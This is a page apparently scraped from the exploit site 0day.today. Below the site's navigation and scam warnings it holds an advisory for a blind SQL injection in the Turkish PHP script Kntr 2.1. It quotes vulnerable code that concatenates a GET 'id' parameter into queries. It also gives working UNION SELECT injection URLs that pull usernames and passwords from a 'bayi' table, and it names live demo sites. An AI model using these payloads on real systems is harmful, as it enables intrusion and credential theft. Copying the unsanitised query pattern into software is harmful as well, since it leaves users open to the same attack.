0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Kntr 2.1(Private) - Blind SQL Injection Vulnerability
===================================================== Kntr 2.1(Private) - Blind SQL Injection Vulnerability ===================================================== ################################################# Author : KnocKout Thankz : DaiMon,BARCOD3 Contact : knockoutr@msn.com Sayz : "Biz RaporlarÑzda.. Fakat Siz Siz Olun AyÑk olun.." ################################################# Script : Kntr - (Parзa Kontцr Sistemleri) Version : 2.1 Script Page : http://www.kntr.org/ Dork : N/A Vulnerable Files : icerik_goster.php,yardim.php ################################################ Demo : http://www.kontor.us Demo: http://www.kontormakinesi.net ############################################### ############ Error Line in 'icerik_goster.php' ########### .. <?PHP if (isset($_GET['id'])) {?> <div class="baslik"><span class="style1"><?PHP echo(sqlresult('SELECT title FROM simplenews_articles WHERE news_id=' .$_GET['id']));?></span></div> <div class="metin"> <?PHP echo(sqlresult('SELECT article FROM simplenews_articles WHERE news_id=' .$_GET['id']));?> <br /><br /> </div> <?PHP } ?> </body> </html> .. ########################################################### ############# Error Line in 'yardim.php' ################# .. <?php $id=$_GET['id']; $baslik=sqlresult('SELECT baslik FROM yardim WHERE id='.$id); ... ########################################################## Inject to ()by SQL : icerik_goster.php?id=50+union+select+concat%28isim,0x3a,sifre%29+from+bayi+where+bayiid=7 Inject to ()by SQL : yardim.php?id=50+union+select+concat%28isim,0x3a,sifre%29+from+bayi+where+bayiid=7 ############################################################ # 0day.today [2024-11-16] #